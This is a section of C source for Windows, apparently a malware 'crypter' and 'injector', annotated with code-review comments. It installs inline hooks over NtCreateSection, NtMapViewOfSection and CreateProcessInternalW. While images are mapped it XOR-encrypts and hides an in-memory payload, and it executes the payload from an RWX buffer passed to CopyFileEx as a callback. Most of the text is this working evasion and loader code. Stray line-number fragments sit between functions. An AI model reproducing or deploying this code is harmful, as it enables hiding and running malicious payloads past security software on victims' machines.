    if (!WriteProcessMemory(hProc, NtCreate, &tramp_old_ntcreatesection, sizeof tramp_old_ntcreatesection, NULL))
    {
        return FALSE;
    }
    NtCreate(SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize, PageAttributess, SectionAttributes, FileHandle);
    hook_ntcreatesection(hProc);
    return 1;

}
/*
 * hook_ntcreatesection - install the 13-byte stub over ntdll!NtCreateSection,
 * redirecting it to ntCreateMySection.
 *
 * Saves the export's first 13 bytes into tramp_old_ntcreatesection, patches
 * the target address into tramp_ntcreatesection[2..9], and writes the stub
 * with WriteProcessMemory on the handle passed in. exit(-1) if the export
 * cannot be resolved.
 *
 * Returns 1 on success and -1 on write failure. NOTE(review): -1 is a
 * non-zero BOOL, so a caller testing `!hook_ntcreatesection(...)` sees
 * success.
 *
 * Review notes (left unchanged):
 *  - the VirtualProtect before the write targets `tramp2` but sizes it with
 *    `sizeof tramp_ntcreatesection`; this looks like a copy-paste slip from
 *    hook_ntmap(), since the buffer actually written is
 *    tramp_ntcreatesection.
 *  - `sizeof NtCreate` is pointer-sized, not 13 bytes; VirtualProtect results
 *    are unchecked.
 */
BOOL hook_ntcreatesection(HANDLE hProc)
{
    myNtCreateSection NtCreate;
    NtCreate = (myNtCreateSection)GetProcAddress(GetModuleHandle("NTDLL.dll"), "NtCreateSection");
    if (!NtCreate)
        exit(-1);
    DWORD written3;


    VirtualProtect(NtCreate, sizeof NtCreate, PAGE_EXECUTE_READWRITE, &written3);

    //WriteProcessMemory(hProc, &CreateProcessInternalW, &hook_CreateProcessA, sizeof CreateProcessInternalW, NULL);
    //WriteProcessMemory(hProc, &CreateProcessInternalW2, &hook_CreateProcessA, sizeof CreateProcessInternalW2, NULL);
    void* shit3 = (void*)ntCreateMySection;   // stub target


    // Save original prologue; embed target address in the stub.
    memcpy(tramp_old_ntcreatesection, NtCreate, sizeof tramp_old_ntcreatesection);
    memcpy(&tramp_ntcreatesection[2], &shit3, sizeof shit3);

    DWORD old3;

    VirtualProtect(tramp2, sizeof tramp_ntcreatesection, PAGE_EXECUTE_READWRITE, &old3);   // NOTE(review): tramp2, not tramp_ntcreatesection


    if (!WriteProcessMemory(hProc, (LPVOID*)NtCreate, &tramp_ntcreatesection, sizeof tramp_ntcreatesection, NULL))
    {
        return -1;
    }
    return 1;
}
729 |
730 |
// File-scope state: aux, lpdata, cbdata and iteration are not referenced by
// any code visible in this file section.
__int64 aux, lpdata, cbdata;
int iteration=0;
// Forward declarations: the NtMapViewOfSection stub installer and the
// replacement it points at; they reference each other.
BOOL hook_ntmap(HANDLE hProc);
NTSTATUS null_function(HANDLE SectionHandle, HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect);
/*
 * hook_ntmap - install the 13-byte `tramp2` stub over
 * ntdll!NtMapViewOfSection, redirecting it to null_function.
 *
 * Saves the export's first 13 bytes into tramp2_old, patches the target
 * address into tramp2[2..9], and writes the stub with WriteProcessMemory on
 * the handle passed in. exit(-1) if the export cannot be resolved.
 *
 * Returns 1 on success and -1 on write failure. NOTE(review): -1 is a
 * non-zero BOOL, so a caller testing `!hook_ntmap(...)` sees success.
 * `sizeof NtMap` is pointer-sized, not 13 bytes; VirtualProtect results are
 * unchecked.
 */
BOOL hook_ntmap(HANDLE hProc)
{
    myNtMapViewOfSection NtMap;
    NtMap = (myNtMapViewOfSection)GetProcAddress(GetModuleHandle("NTDLL.dll"), "NtMapViewOfSection");
    if (!NtMap)
        exit(-1);
    DWORD written3;


    VirtualProtect(NtMap, sizeof NtMap, PAGE_EXECUTE_READWRITE, &written3);

    //WriteProcessMemory(hProc, &CreateProcessInternalW, &hook_CreateProcessA, sizeof CreateProcessInternalW, NULL);
    //WriteProcessMemory(hProc, &CreateProcessInternalW2, &hook_CreateProcessA, sizeof CreateProcessInternalW2, NULL);
    void* shit2 = (void*)null_function;   // stub target


    // Save original prologue; embed target address in the stub.
    memcpy(tramp2_old, NtMap, sizeof tramp2_old);
    memcpy(&tramp2[2], &shit2, sizeof shit2);

    DWORD old3;

    VirtualProtect(tramp2, sizeof tramp2, PAGE_EXECUTE_READWRITE, &old3);


    if (!WriteProcessMemory(hProc, (LPVOID*)NtMap, &tramp2, sizeof tramp2, NULL))
    {
        return -1;
    }
    return 1;
}
765 |
766 |
767 |
/*
 * restore_hook_image_notification - unhook NtMapViewOfSection and call it
 * with the forwarded arguments (restore_ntmap), then re-install the stub
 * (hook_ntmap).
 *
 * Always returns TRUE: restore_ntmap's result is ignored. Opens a second
 * PROCESS_ALL_ACCESS handle to the current process (restore_ntmap opened
 * one too) and never closes it.
 */
BOOL restore_hook_image_notification(HANDLE SectionHandle, HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect)
{
    restore_ntmap(SectionHandle, ProcessHandle, BaseAddress, ZeroBits, CommitSize, SectionOffset, ViewSize, InheritDisposition, AllocationType, Win32Protect);
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, NULL, GetCurrentProcessId());
    hook_ntmap(hProc);
    return TRUE;

}
776 |
// Mirror of the undocumented NT OBJECT_TYPE_INFORMATION layout. Not referenced
// by any code visible in this file section (null_function uses the shorter
// PUBLIC_OBJECT_TYPE_INFORMATION2 below instead).
typedef struct _OBJECT_TYPE_INFORMATION
{
    UNICODE_STRING TypeName;
    ULONG TotalNumberOfObjects;
    ULONG TotalNumberOfHandles;
    ULONG TotalPagedPoolUsage;
    ULONG TotalNonPagedPoolUsage;
    ULONG TotalNamePoolUsage;
    ULONG TotalHandleTableUsage;
    ULONG HighWaterNumberOfObjects;
    ULONG HighWaterNumberOfHandles;
    ULONG HighWaterPagedPoolUsage;
    ULONG HighWaterNonPagedPoolUsage;
    ULONG HighWaterNamePoolUsage;
    ULONG HighWaterHandleTableUsage;
    ULONG InvalidAttributes;
    GENERIC_MAPPING GenericMapping;
    ULONG ValidAccessMask;
    BOOLEAN SecurityRequired;
    BOOLEAN MaintainHandleCount;
    ULONG PoolType;
    ULONG DefaultPagedPoolCharge;
    ULONG DefaultNonPagedPoolCharge;
} OBJECT_TYPE_INFORMATION, * POBJECT_TYPE_INFORMATION;
801 |
// Type-name-only view used with NtQueryObject(ObjectTypeInformation) in
// null_function(). Reserved[] presumably leaves room for the TypeName
// characters the kernel appends after the UNICODE_STRING - confirm against
// the SDK's PUBLIC_OBJECT_TYPE_INFORMATION. NOTE(review): a tag beginning
// with a double underscore is a reserved identifier.
typedef struct __PUBLIC_OBJECT_TYPE_INFORMATION2 {
    UNICODE_STRING TypeName;
    ULONG Reserved[50]; // reserved for internal use
} PUBLIC_OBJECT_TYPE_INFORMATION2, * PPUBLIC_OBJECT_TYPE_INFORMATION2;
806 |
807 |
/*
 * null_function - replacement installed over NtMapViewOfSection.
 *
 * Sequence: if a file named "holyshit" exists in the working directory,
 * delete it; XOR the global payload region [offset, offset + size_offset)
 * with the repeating key; query the section being mapped (NtQueryObject type
 * info, NtQuerySection basic info) and print a line when
 * sbi.Attributes == 16777216; unhook/call/re-hook the real
 * NtMapViewOfSection through restore_hook_image_notification(); make the
 * first 1024 bytes of the payload PAGE_NOACCESS for 500 ms; restore; XOR the
 * payload back.
 *
 * Returns 1 (not STATUS_SUCCESS, though NT_SUCCESS() accepts it); the real
 * NTSTATUS is lost.
 *
 * Review notes (left unchanged):
 *  - the fopen("holyshit") FILE* is never fclose()d; DeleteFile's result is
 *    unchecked.
 *  - `key_size = sizeof key` is pointer-sized, not strlen(key) (same defect
 *    as hook_CreateProcessA).
 *  - dupHandle is never closed and is used even when DuplicateHandle failed,
 *    in which case it is uninitialised.
 *  - `sbi` is read even when NtQuerySection failed (uninitialised read), and
 *    GetLastError() is printed instead of the NTSTATUS `stat`.
 *  - 16777216 (0x01000000) is a magic number; it appears to equal SEC_IMAGE
 *    rather than SEC_IMAGE_NO_EXECUTE, which the message suggests was
 *    intended - confirm against winnt.h.
 *  - the PAGE_NOACCESS window covers 1024 bytes, not size_offset.
 *  - when restore == FALSE the function returns with the payload still
 *    XOR-encoded (the second XOR pass is skipped).
 *  - hHeaps, mask, ii, old, typeName and queryObjectRet are unused.
 *  - NtQuerySection, SECTION_BASIC_INFORMATION, SectionBasicInformation,
 *    NtQueryObject and ObjectTypeInformation come from declarations outside
 *    this file section.
 */
NTSTATUS null_function(HANDLE SectionHandle, HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect)
{
    FILE* fp = fopen("holyshit", "rb");       // existence probe; never closed
    if (fp)
        DeleteFile("holyshit");
    HANDLE hHeaps[250];                       // unused
    const char* mask = "MZE";                 // unused
    const char* key = "ASDFASF234124jklsf-4&%/&/";
    size_t key_size = sizeof key;             // pointer size, not strlen(key)
    //printf("Doing good\n");
    __int64 ii = (__int64)offset;             // unused
    int keyIndex = 0;
    // XOR pass 1 over the payload region.
    for (__int64 ij = (__int64)offset; (__int64)ij < (_int64)offset + size_offset; ij += 0x01)
    {
        *(char*)ij = *(char*)ij ^ key[keyIndex % key_size];
        keyIndex += 1;
    }
    //printf("Key index: %d\n", keyIndex);
    //printf("Successfully encrypted XOR\n");
    DWORD old;                                // unused (its VirtualProtect is commented out)
    //VirtualProtect(offset, size_offset, PAGE_NOACCESS, &old);

    NtQuerySection* ntsection = (NtQuerySection*)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySection");
    SECTION_BASIC_INFORMATION sbi;
    HANDLE hProcessCurrent = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId());
    HANDLE dupHandle;
    // Duplicate the incoming section handle with access mask 0x0001 for querying.
    int ress = DuplicateHandle(hProcessCurrent, SectionHandle, hProcessCurrent, &dupHandle, 0x0001, NULL, FALSE);
    if (ress == 0) {
        if (GetLastError() == ERROR_NOT_SUPPORTED) {
            // it is most likely an ETWRegistration
            printf("Error not supported\n");
        }

        if (GetLastError() == ERROR_ACCESS_DENIED) {
            printf("Error access denied\n");
        }

        //wprintf(L"Error on DuplicateHandle for %#010x \n", SourceHandle);
        //std::wcout << GetLastErrorStdStr();

    }
    // NOTE(review): dupHandle is used below even if the duplication failed.
    PUBLIC_OBJECT_TYPE_INFORMATION2 oti;
    ULONG retLen;
    int queryObjectRet = NtQueryObject(dupHandle, ObjectTypeInformation, &oti, sizeof(oti), &retLen);   // result unused

    wchar_t* typeName = oti.TypeName.Buffer;  // unused
    if (hProcessCurrent)
    {


        NTSTATUS stat = ntsection((HANDLE)dupHandle, SectionBasicInformation, &sbi, sizeof sbi, 0);
        if (!NT_SUCCESS(stat)) {
            //printf("Error on NtQuerySection\n");
            printf("Error: %lu\n", GetLastError());   // prints last-error, not `stat`
        }
        if (sbi.Attributes==16777216)         // 0x01000000, see header note
            printf("Image no execution mapped\n");



    }
    DWORD old_noaccess;
    // Unhook, run the real NtMapViewOfSection, re-hook.
    BOOL restore = restore_hook_image_notification(SectionHandle, ProcessHandle, BaseAddress, ZeroBits, CommitSize, SectionOffset, ViewSize, InheritDisposition, AllocationType, Win32Protect);
    VirtualProtect(offset, 1024, PAGE_NOACCESS, &old_noaccess);   // 1024 bytes only, not size_offset

    Sleep(500);
    DWORD oldold;
    VirtualProtect(offset, 1024, old_noaccess, &oldold);
    CloseHandle(hProcessCurrent);             // dupHandle is not closed
    //Sleep(500);
    if (restore == FALSE)
    {
        return 0;   // payload left XOR-encoded on this path
    }

    // XOR pass 2: same key sequence, restores the original bytes.
    keyIndex = 0;
    for (__int64 ij = (__int64)offset; (__int64)ij < (_int64)offset + size_offset; ij += 0x01)
    {
        *(char*)ij = *(char*)ij ^ key[keyIndex % key_size];
        keyIndex += 1;

    }


    return 1;   // real NTSTATUS is lost (see header)

}
895 |
896 |
/*
 * hook_createprocess - install the 13-byte `tramp` stub over
 * kernelbase!CreateProcessInternalW, redirecting it to hook_CreateProcessA.
 *
 * Saves the export's original 13 bytes into tramp_old first, then embeds the
 * target address in tramp[2..9] and writes the stub with WriteProcessMemory
 * on the handle passed in. exit(-1) if the export cannot be resolved.
 * puts("\n") emits two newlines (puts appends its own).
 *
 * Returns 1 on success, -1 if WriteProcessMemory fails. NOTE(review): -1 is a
 * non-zero BOOL and reads as success to a caller using `!`. VirtualProtect
 * results are unchecked; `sizeof CreateProcessInternalW` is pointer-sized,
 * not 13 bytes.
 */
BOOL hook_createprocess(HANDLE hProc)
{
    DWORD written2;
    PCreateProcessInternalW CreateProcessInternalW;
    CreateProcessInternalW = (PCreateProcessInternalW)GetProcAddress(GetModuleHandle("KERNELBASE.dll"), "CreateProcessInternalW");
    if (!CreateProcessInternalW)
        exit(-1);
    VirtualProtect(CreateProcessInternalW, sizeof CreateProcessInternalW, PAGE_EXECUTE_READWRITE, &written2);

    puts("\n");
    void* shit = (void*)hook_CreateProcessA;  // stub target
    // Save original prologue; embed target address in the stub.
    memcpy(tramp_old, CreateProcessInternalW, sizeof tramp_old);
    memcpy(&tramp[2], &shit, sizeof(shit));
    DWORD old2;
    VirtualProtect(tramp, sizeof tramp, PAGE_EXECUTE_READWRITE, &old2);
    if (!WriteProcessMemory(hProc, (LPVOID*)CreateProcessInternalW, &tramp, sizeof tramp, NULL))
    {
        return -1;
    }
    return 1;
}
918 |
919 |
920 |
921 |
/*
 * main - two command-line modes selected by argv[1].
 *
 *   <exe> crypter <file>    runs crypter(file, false, &size, false); the
 *                           malloc()ed return value is leaked; exits 1.
 *   <exe> injector <file>   sizes the payload with encrypter_111(..., true),
 *                           fetches it with a second call and copies it into
 *                           a heap buffer published through the globals
 *                           offset/size_offset; installs the three inline
 *                           hooks; makes the buffer RWX; passes it to
 *                           CopyFileEx(argv[2], "deletefile", ...) as the
 *                           LPPROGRESS_ROUTINE argument.
 *
 * Review notes (left unchanged):
 *  - `static DWORD size = NULL` and `DWORD dold = NULL` assign a pointer
 *    constant to integers.
 *  - encrypter_111's second result goes straight into memcpy with no null
 *    check and is never freed; malloc(size) is unchecked.
 *  - hProc (PROCESS_ALL_ACCESS on the current process) is never closed; the
 *    hook_* return values are ignored (and they return -1, not FALSE, on
 *    failure).
 *  - printf("%d") with the DWORD from GetLastError() mismatches the format.
 *  - the usage strings do not list the two modes; the "crypter" path exits 1
 *    (failure by convention) on success.
 *  - an unrecognised argv[1] falls off the end of main (implicit return 0 in
 *    C++).
 *  - encrypter_111, offset and size_offset are defined earlier in the file.
 */
int main(int argc, char **argv)
{

    if (argc < 2)
    {
        printf("Argc: %d\n", argc);
        printf("\nUsage: ./%s \n", argv[0]);
        return 0;
    }

    if (strcmp(argv[1], "crypter") == 0)
    {
        if (argc != 3)
        {
            printf("\nUsage: ./%s \n", argv[0]);
            return 0;
        }
        static DWORD size = NULL;
        crypter(argv[2], false, &size, false);   // returned buffer leaked
        printf("Creating file: %s.ramon\n", argv[2]);
        return 1;
    }
    if (strcmp(argv[1], "injector") == 0)
    {
        if (argc != 3)
        {
            printf("\nUsage: ./%s \n", argv[0]);
            return 0;
        }
        static DWORD size = NULL;

        // First call: size only (calculate=true). Second call: the data.
        encrypter_111(argv[2], true, &size, true);
        char* lloc = (char*)malloc(size);                               // unchecked
        memcpy(lloc, encrypter_111(argv[2], true, &size, false), size); // source unchecked, never freed
        offset = (void*)lloc;
        size_offset = size;
        HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, NULL, GetCurrentProcessId());
        hook_createprocess(hProc);
        hook_ntmap(hProc);
        hook_ntcreatesection(hProc);
        DWORD dold = NULL;
        if (!VirtualProtect(lloc, size, PAGE_EXECUTE_READWRITE, &dold))
            return 0;
        if (!CopyFileEx(argv[2], "deletefile", (LPPROGRESS_ROUTINE)lloc, NULL, FALSE, 0))
            printf("Error: %d\n", GetLastError());
        free(lloc);
    }


}